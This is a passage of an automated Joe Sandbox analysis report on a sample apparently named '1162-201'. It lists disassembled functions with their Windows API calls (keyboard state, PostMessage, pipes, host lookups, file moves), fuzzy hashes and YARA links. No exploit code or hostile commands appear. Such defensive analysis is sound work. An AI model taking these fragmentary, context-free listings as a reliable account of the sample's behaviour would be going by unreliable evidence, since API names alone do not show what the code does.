                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                      • String ID:
                                                                      • API String ID: 4072528602-0
                                                                      • Opcode ID: 018e507425cdce6aba77556511df4c77aa56dd7d0a3d72a89b8191042466983a
                                                                      • Instruction ID: a66d0516bfd26e2021c76f2d4149dfc4045f212b00425df69e728319c95ae82c
                                                                      • Opcode Fuzzy Hash: 018e507425cdce6aba77556511df4c77aa56dd7d0a3d72a89b8191042466983a
                                                                      • Instruction Fuzzy Hash: 4A71AE34609204AFEF209F94C884FFABBB9EF49340F140559FD65972A1CB31AE45DB24
                                                                      Function 00C8AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 00C8AEF9
                                                                      • GetKeyboardState.USER32(?), ref: 00C8AF0E
                                                                      • SetKeyboardState.USER32(?), ref: 00C8AF6F
                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C8AF9D
                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C8AFBC
                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C8AFFD
                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C8B020
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: be7004bac885188845bf3309c529bc3d80066976d5adc85cada2ddb8dc546804
                                                                      • Instruction ID: 79c149c97e03f907b4b4f65dc23031dd1e43e2e8ff0f83f3ed9b51a18e39e2ad
                                                                      • Opcode Fuzzy Hash: be7004bac885188845bf3309c529bc3d80066976d5adc85cada2ddb8dc546804
                                                                      • Instruction Fuzzy Hash: F25103F06047D13DFB36A2748C45BBBBEA95B06308F08858AF2E9454C2D3D8AED4D759
                                                                      Function 00C8ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32(00000000), ref: 00C8AD19
                                                                      • GetKeyboardState.USER32(?), ref: 00C8AD2E
                                                                      • SetKeyboardState.USER32(?), ref: 00C8AD8F
                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C8ADBB
                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C8ADD8
                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C8AE17
                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C8AE38
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: f246c993cedf010b928891080552d2f41f4c76e805bc6cd9e952e2ec2c1528bd
                                                                      • Instruction ID: 23044cdd6cd0a04a669df5c750bfb84f15a13e42bcd13b1429a87aa5a0dde1bc
                                                                      • Opcode Fuzzy Hash: f246c993cedf010b928891080552d2f41f4c76e805bc6cd9e952e2ec2c1528bd
                                                                      • Instruction Fuzzy Hash: 75512AA05047D13DFB3363348C85B7ABE985B06309F08898AF1E5868C2C394ED94E75A
                                                                      Function 00C5542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(00C63CD6,?,?,?,?,?,?,?,?,00C55BA3,?,?,00C63CD6,?,?), ref: 00C55470
                                                                      • __fassign.LIBCMT ref: 00C554EB
                                                                      • __fassign.LIBCMT ref: 00C55506
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00C63CD6,00000005,00000000,00000000), ref: 00C5552C
                                                                      • WriteFile.KERNEL32(?,00C63CD6,00000000,00C55BA3,00000000,?,?,?,?,?,?,?,?,?,00C55BA3,?), ref: 00C5554B
                                                                      • WriteFile.KERNEL32(?,?,00000001,00C55BA3,00000000,?,?,?,?,?,?,?,?,?,00C55BA3,?), ref: 00C55584
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
                                                                      • Opcode ID: 9b622a2616059f8140783b82c6b0630c0cb964ae184d8ca7d6bb54ab141eb04e
                                                                      • Instruction ID: 817ec145bb7d238a50bdbd988008dd76080019b1772c78e83c7561b94d331252
                                                                      • Opcode Fuzzy Hash: 9b622a2616059f8140783b82c6b0630c0cb964ae184d8ca7d6bb54ab141eb04e
                                                                      • Instruction Fuzzy Hash: 455107B59006499FCB10CFA8D891BEEBBF9EF18301F14411AF955E7291E730DA85CB64
                                                                      Function 00C42D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00C42D4B
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00C42D53
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00C42DE1
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00C42E0C
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00C42E61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: 777162e1a9e29bc6b5e3c18b56ce1448f000ae5022c7882befbeaf6f7fed058b
                                                                      • Instruction ID: 734d3e05bba83fa0471af0813c72340929434d72df4fe6b771dac37410ee5829
                                                                      • Opcode Fuzzy Hash: 777162e1a9e29bc6b5e3c18b56ce1448f000ae5022c7882befbeaf6f7fed058b
                                                                      • Instruction Fuzzy Hash: 8D41B234E00249EBCF10DF69CC86A9EBBB5BF44324F548165F825AB392D731AA05CBD0
                                                                      Function 00C8CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C8DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C8CF22,?), ref: 00C8DDFD
                                                                        • Part of subcall function 00C8DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C8CF22,?), ref: 00C8DE16
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00C8CF45
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00C8CF7F
                                                                      • _wcslen.LIBCMT ref: 00C8D005
                                                                      • _wcslen.LIBCMT ref: 00C8D01B
                                                                      • SHFileOperationW.SHELL32(?), ref: 00C8D061
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 3164238972-1173974218
                                                                      • Opcode ID: b72778fea8726baee61cfe0a2d97f730276318e7003faf0d1097bd792d3147b1
                                                                      • Instruction ID: ec851b21ca98f5d8de4db1b373d88b5bbd3a9b6fbf38f9b9a3629751a93c2f3a
                                                                      • Opcode Fuzzy Hash: b72778fea8726baee61cfe0a2d97f730276318e7003faf0d1097bd792d3147b1
                                                                      • Instruction Fuzzy Hash: F94142719052185FDF12FBA4D9C1ADEB7B8AF18384F1000E6E605EB142EB34AB44DF64
                                                                      Function 00CB2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CB2E1C
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CB2E4F
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CB2E84
                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CB2EB6
                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CB2EE0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CB2EF1
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CB2F0B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 2178440468-0
                                                                      • Opcode ID: dfe2adee70f4252a8a1ebc0ca0af840716d7cfacc9d7056c111c27fcebed74a0
                                                                      • Instruction ID: b773c070c3dd81be481303d0d5673783dd881a86863e7c892a9c5563b647ba69
                                                                      • Opcode Fuzzy Hash: dfe2adee70f4252a8a1ebc0ca0af840716d7cfacc9d7056c111c27fcebed74a0
                                                                      • Instruction Fuzzy Hash: 4231F230644290EFDB218F59DC84FA937E5EB9A721F190164F9118B2B1CBB1EE40DB51
                                                                      Function 00C87726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C87769
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C8778F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00C87792
                                                                      • SysAllocString.OLEAUT32(?), ref: 00C877B0
                                                                      • SysFreeString.OLEAUT32(?), ref: 00C877B9
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00C877DE
                                                                      • SysAllocString.OLEAUT32(?), ref: 00C877EC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 30d98a7eb86dab154199f92c69998bd6c22129c260e399eac625a9a5343dfb7e
                                                                      • Instruction ID: ba4dd7e2ac651319be5aabdf89f64f56cbe4f870b502e1f591294d158b0bff94
                                                                      • Opcode Fuzzy Hash: 30d98a7eb86dab154199f92c69998bd6c22129c260e399eac625a9a5343dfb7e
                                                                      • Instruction Fuzzy Hash: 7E21C476604219AFDF11EFA8CC88EBF73ACEB09768B148625F914DB150E670DD41CB64
                                                                      Function 00C877FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C87842
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C87868
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00C8786B
                                                                      • SysAllocString.OLEAUT32 ref: 00C8788C
                                                                      • SysFreeString.OLEAUT32 ref: 00C87895
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00C878AF
                                                                      • SysAllocString.OLEAUT32(?), ref: 00C878BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 4b7cf7350dfefac0c26ff0a4b72f5a8b31181b9a83dffdcf169802ee361c0d75
                                                                      • Instruction ID: 81f0c56ade281ecec909af2e6a17aa281accd95b5e1c76c2b895da5a2c83ab8e
                                                                      • Opcode Fuzzy Hash: 4b7cf7350dfefac0c26ff0a4b72f5a8b31181b9a83dffdcf169802ee361c0d75
                                                                      • Instruction Fuzzy Hash: 74217731608104AFDB10AFA9DC88EBA77ECEB09764B108225F915DB2E1E674DD41CB78
                                                                      Function 00C904D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00C904F2
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C9052E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: 25482ccf42341fd1376964e22218eeaa6db31b8675d4ddaa4643318e5559c703
                                                                      • Instruction ID: 0d0c56e262bad4b07d5f85011f993a57a3ee5089444e860e165eadcd6fc1ebee
                                                                      • Opcode Fuzzy Hash: 25482ccf42341fd1376964e22218eeaa6db31b8675d4ddaa4643318e5559c703
                                                                      • Instruction Fuzzy Hash: AE215A75500305AFDF209F69D849B9A7BA8AF44B64F714A29E8B1E62E0D7709A40CF24
                                                                      Function 00C905A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00C905C6
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C90601
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: c90c62a8fb0311744f27c4b592f609754ecd3fe115c9a244ce69c7e55e561dd5
                                                                      • Instruction ID: 2b1bd377f3759cd1f754cf6fbf5df1e47d2dfcffb5228585d74c9917071e9448
                                                                      • Opcode Fuzzy Hash: c90c62a8fb0311744f27c4b592f609754ecd3fe115c9a244ce69c7e55e561dd5
                                                                      • Instruction Fuzzy Hash: 36213D755003059FDF209F699848A9A77A8AF95B25F300B19FCB1E72E0D7709A60CB20
                                                                      Function 00C8DE27 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 348263315-3771769585
                                                                      • Opcode ID: 1fc8de045c31e0b2c1770941a9d7dfe5ab63f1d154e3ba9f2912a79021409e04
                                                                      • Instruction ID: 3a189c6961229dcf1632c25c9e7f2d0b452b92a4074fa2b525061c0b304edd7d
                                                                      • Opcode Fuzzy Hash: 1fc8de045c31e0b2c1770941a9d7dfe5ab63f1d154e3ba9f2912a79021409e04
                                                                      • Instruction Fuzzy Hash: C2115971900114AFCB24BB20DC4AFEE37ACEF10315F1001B9F146AA0D1EF719A819B64
                                                                      Function 00C5D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C5D7A3: _free.LIBCMT ref: 00C5D7CC
                                                                      • _free.LIBCMT ref: 00C5D82D
                                                                        • Part of subcall function 00C529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000), ref: 00C529DE
                                                                        • Part of subcall function 00C529C8: GetLastError.KERNEL32(00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000,00000000), ref: 00C529F0
                                                                      • _free.LIBCMT ref: 00C5D838
                                                                      • _free.LIBCMT ref: 00C5D843
                                                                      • _free.LIBCMT ref: 00C5D897
                                                                      • _free.LIBCMT ref: 00C5D8A2
                                                                      • _free.LIBCMT ref: 00C5D8AD
                                                                      • _free.LIBCMT ref: 00C5D8B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                      • Instruction ID: 66ba420e65a1cf823148204d515842b2114572188afea480502a81a2c306e6ff
                                                                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                      • Instruction Fuzzy Hash: DF11B135540B04AAD531BFB0CC07FCB7BDCEF19342F400824BA9AE6992CA24B5896654
                                                                      Function 00C8DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C8DA74
                                                                      • LoadStringW.USER32(00000000), ref: 00C8DA7B
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C8DA91
                                                                      • LoadStringW.USER32(00000000), ref: 00C8DA98
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C8DADC
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00C8DAB9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 4072794657-3128320259
                                                                      • Opcode ID: 737da4218315c4ee19ae2d14e7367e58b65cd84e957ecab61dfd978f7c1917f1
                                                                      • Instruction ID: e1e19340adbcf361551ba28f83b119c2777deb050517fed3a7d9481aa1a63ef5
                                                                      • Opcode Fuzzy Hash: 737da4218315c4ee19ae2d14e7367e58b65cd84e957ecab61dfd978f7c1917f1
                                                                      • Instruction Fuzzy Hash: 8D0162F29402087FE711ABA49DC9FFB376CE708705F400591B706E2081EA749E844F74
                                                                      Function 00C9096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(00F4EAE8,00F4EAE8), ref: 00C9097B
                                                                      • EnterCriticalSection.KERNEL32(00F4EAC8,00000000), ref: 00C9098D
                                                                      • TerminateThread.KERNEL32(00F4EAE0,000001F6), ref: 00C9099B
                                                                      • WaitForSingleObject.KERNEL32(00F4EAE0,000003E8), ref: 00C909A9
                                                                      • CloseHandle.KERNEL32(00F4EAE0), ref: 00C909B8
                                                                      • InterlockedExchange.KERNEL32(00F4EAE8,000001F6), ref: 00C909C8
                                                                      • LeaveCriticalSection.KERNEL32(00F4EAC8), ref: 00C909CF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
